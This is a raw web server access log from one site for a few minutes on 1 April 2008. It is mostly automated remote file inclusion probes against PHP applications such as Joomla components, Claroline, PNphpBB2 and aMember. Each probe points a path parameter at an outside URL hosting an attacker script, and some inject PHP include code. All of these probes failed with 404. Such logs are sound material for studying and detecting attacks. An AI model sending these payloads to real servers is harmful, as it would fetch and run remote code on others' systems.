38.113.65.131 - - [01/Apr/2008:08:36:32 -0700] "GET /logs/access_080225.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:08:36:34 -0700] "GET /logs/access_080225.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:08:36:39 -0700] "GET /logs/access_080125.log//claroline/tracking/userLog.php?rootSys=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:08:36:39 -0700] "GET //claroline/tracking/userLog.php?rootSys=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:08:36:40 -0700] "GET /logs//claroline/tracking/userLog.php?rootSys=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:08:36:42 -0700] "GET /logs/access_080225.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [01/Apr/2008:08:36:53 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:08:36:59 -0700] "GET /logs/access_080125.log//claroline/tracking/userLog.php?rootSys=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:08:36:59 -0700] "GET //claroline/tracking/userLog.php?rootSys=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:08:37:00 -0700] "GET /logs//claroline/tracking/userLog.php?rootSys=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:37:22 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:37:22 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:37:23 -0700] "GET /logs/access_080218.log/Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:37:23 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:37:23 -0700] "GET /Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.89.22.121 - - [01/Apr/2008:08:37:23 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://www.lindor.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.22.121 - - [01/Apr/2008:08:37:23 -0700] "GET //index.php?option=com_custompages&cpage=http://www.lindor.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.22.121 - - [01/Apr/2008:08:37:23 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.lindor.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:37:23 -0700] "GET /logs/Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.171.66.229 - - [01/Apr/2008:08:37:26 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://www.lindor.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.171.66.229 - - [01/Apr/2008:08:37:26 -0700] "GET //index.php?option=com_custompages&cpage=http://www.lindor.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.171.66.229 - - [01/Apr/2008:08:37:27 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.lindor.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:37:27 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:37:27 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:37:28 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.9 - - [01/Apr/2008:08:37:30 -0700] "GET /logs/access_080225.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.122 - - [01/Apr/2008:08:37:42 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.30.179.247 - - [01/Apr/2008:08:37:42 -0700] "GET /logs/access_080308.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.191.81.165 - - [01/Apr/2008:08:37:45 -0700] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.234.21.89 - - [01/Apr/2008:08:37:49 -0700] "GET /logs/access_080125.log//claroline/tracking/userLog.php?rootSys=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.234.21.89 - - [01/Apr/2008:08:37:49 -0700] "GET //claroline/tracking/userLog.php?rootSys=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.234.21.89 - - [01/Apr/2008:08:37:50 -0700] "GET /logs//claroline/tracking/userLog.php?rootSys=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:08:37:52 -0700] "GET /logs/access_080201.log//claroline/tracking/userLog.php?rootSys=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:37:54 -0700] "GET /logs/access_080207.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:37:55 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:37:55 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:08:38:00 -0700] "GET /logs/access_080201.log//claroline/tracking/userLog.php?rootSys=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:08:38:02 -0700] "GET /logs/access_080211.log/accounts.php?command=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:08:38:02 -0700] "GET /accounts.php?command=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:08:38:02 -0700] "GET /logs/accounts.php?command=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.219.170.153 - - [01/Apr/2008:08:38:20 -0700] "GET /logs/access_080124.log/errors.php?error=http://konfraternia.tarnow.pl/cutenews/data/.yop/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.219.170.153 - - [01/Apr/2008:08:38:20 -0700] "GET /errors.php?error=http://konfraternia.tarnow.pl/cutenews/data/.yop/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.219.170.153 - - [01/Apr/2008:08:38:20 -0700] "GET /logs/errors.php?error=http://konfraternia.tarnow.pl/cutenews/data/.yop/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.219.170.153 - - [01/Apr/2008:08:38:25 -0700] "GET /logs/access_080124.log/errors.php?error=http://konfraternia.tarnow.pl/cutenews/data/.yop/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.219.170.153 - - [01/Apr/2008:08:38:25 -0700] "GET /errors.php?error=http://konfraternia.tarnow.pl/cutenews/data/.yop/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.219.170.153 - - [01/Apr/2008:08:38:26 -0700] "GET /logs/errors.php?error=http://konfraternia.tarnow.pl/cutenews/data/.yop/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:08:38:40 -0700] "GET /logs/access_080313.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:38:49 -0700] "GET /logs/access_080225.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.234.21.89 - - [01/Apr/2008:08:39:03 -0700] "GET /logs/access_080201.log//claroline/tracking/userLog.php?rootSys=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.219.170.153 - - [01/Apr/2008:08:39:25 -0700] "GET /logs/access_080125.log/errors.php?error=http://konfraternia.tarnow.pl/cutenews/data/.yop/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:08:39:30 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:08:39:30 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:08:39:31 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:08:39:39 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:08:39:39 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [01/Apr/2008:08:39:39 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.219.170.153 - - [01/Apr/2008:08:39:40 -0700] "GET /logs/access_080125.log/errors.php?error=http://konfraternia.tarnow.pl/cutenews/data/.yop/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:08:40:02 -0700] "GET /logs/access_080125.log/Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.46.131.186 - - [01/Apr/2008:08:40:25 -0700] "GET //amember/plugins/payment/secpay/config.inc.php?config[root_dir]=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.43.210.110 - - [01/Apr/2008:08:40:25 -0700] "GET /logs/access_080313.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
81.89.137.99 - - [01/Apr/2008:08:40:35 -0700] "GET /index1.php?choix=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.60.90 - - [01/Apr/2008:08:40:56 -0700] "GET /logs/access_080305.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.60.90 - - [01/Apr/2008:08:40:58 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.60.90 - - [01/Apr/2008:08:40:59 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.249.11.138 - - [01/Apr/2008:08:41:04 -0700] "GET /logs/access_080218.log//include/functions_common.php?gl_root_path=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.97.211.97 - - [01/Apr/2008:08:41:06 -0700] "GET //PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
89.97.211.97 - - [01/Apr/2008:08:41:06 -0700] "GET /logs//PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
72.46.131.186 - - [01/Apr/2008:08:41:10 -0700] "GET /logs/access_080119.log//amember/plugins/payment/secpay/config.inc.php?config[root_dir]=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.46.131.186 - - [01/Apr/2008:08:41:10 -0700] "GET //amember/plugins/payment/secpay/config.inc.php?config[root_dir]=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.46.131.186 - - [01/Apr/2008:08:41:10 -0700] "GET /logs//amember/plugins/payment/secpay/config.inc.php?config[root_dir]=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.28.184.235 - - [01/Apr/2008:08:41:15 -0700] "GET /logs/access_071226.log//include/lib/lib_head.php?cfgPathModule=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.28.184.235 - - [01/Apr/2008:08:41:15 -0700] "GET //include/lib/lib_head.php?cfgPathModule=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.28.184.235 - - [01/Apr/2008:08:41:15 -0700] "GET /logs//include/lib/lib_head.php?cfgPathModule=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.234.21.89 - - [01/Apr/2008:08:41:22 -0700] "GET /logs/access_080313.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.107.122 - - [01/Apr/2008:08:41:36 -0700] "GET /logs/access_080312.log//index.php?admin=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.107.122 - - [01/Apr/2008:08:41:36 -0700] "GET //index.php?admin=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.107.122 - - [01/Apr/2008:08:41:36 -0700] "GET /logs//index.php?admin=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.140 - - [01/Apr/2008:08:41:55 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.kttcrew.com/1234.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.18.207.65 - - [01/Apr/2008:08:42:01 -0700] "GET /logs/access_080223.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [01/Apr/2008:08:42:01 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.89.137.99 - - [01/Apr/2008:08:42:09 -0700] "GET /logs/access_080207.log/index1.php?choix=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [01/Apr/2008:08:42:09 -0700] "GET /logs/index1.php?choix=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [01/Apr/2008:08:42:12 -0700] "GET /logs/access_071230.log/index1.php?choix=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.84.20.85 - - [01/Apr/2008:08:42:33 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.84.20.85 - - [01/Apr/2008:08:42:33 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.84.20.85 - - [01/Apr/2008:08:42:33 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.46.131.186 - - [01/Apr/2008:08:42:43 -0700] "GET /logs/access_080215.log//amember/plugins/payment/secpay/config.inc.php?config[root_dir]=http://www.amptekelectric.com//modules/Forums/admin/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.84.20.85 - - [01/Apr/2008:08:42:47 -0700] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
157.100.153.34 - - [01/Apr/2008:08:42:51 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
157.100.153.34 - - [01/Apr/2008:08:42:52 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
157.100.153.34 - - [01/Apr/2008:08:42:52 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.29.237 - - [01/Apr/2008:08:42:54 -0700] "GET /logs/access_070724.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.21.103 - - [01/Apr/2008:08:42:56 -0700] "GET /bikes/GPS/?N=A HTTP/1.0" 200 800 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
84.18.207.65 - - [01/Apr/2008:08:43:10 -0700] "GET /logs/access_080215.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.7.165 - - [01/Apr/2008:08:43:10 -0700] "GET /minamijewelry/source_images/batch1/?N=D HTTP/1.0" 200 5016 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:08:44:32 -0700] "GET /logs/access_080218.log/Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.60.90 - - [01/Apr/2008:08:44:32 -0700] "GET /logs/access_080225.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://tbcmd.110mb.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:08:44:33 -0700] "GET /Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:08:44:33 -0700] "GET /logs/Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:08:44:35 -0700] "GET /logs/access_080218.log/Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:08:44:35 -0700] "GET /Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.113.65.131 - - [01/Apr/2008:08:44:35 -0700] "GET /logs/Ultrastats/include/functions_common.php?gl_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:08:44:37 -0700] "GET //mcf.php?content=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:08:44:37 -0700] "GET /logs//mcf.php?content=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:08:44:52 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:08:44:52 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:08:44:53 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.81.233 - - [01/Apr/2008:08:44:55 -0700] "GET /index1.php?choix=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.80.134 - - [01/Apr/2008:08:45:36 -0700] "GET /logs//amember/plugins/payment/secpay/config.inc.php?config[root_dir]=http://sinbinxxx.com/test/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
209.62.80.134 - - [01/Apr/2008:08:45:36 -0700] "GET //amember/plugins/payment/secpay/config.inc.php?config[root_dir]=http://sinbinxxx.com/test/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
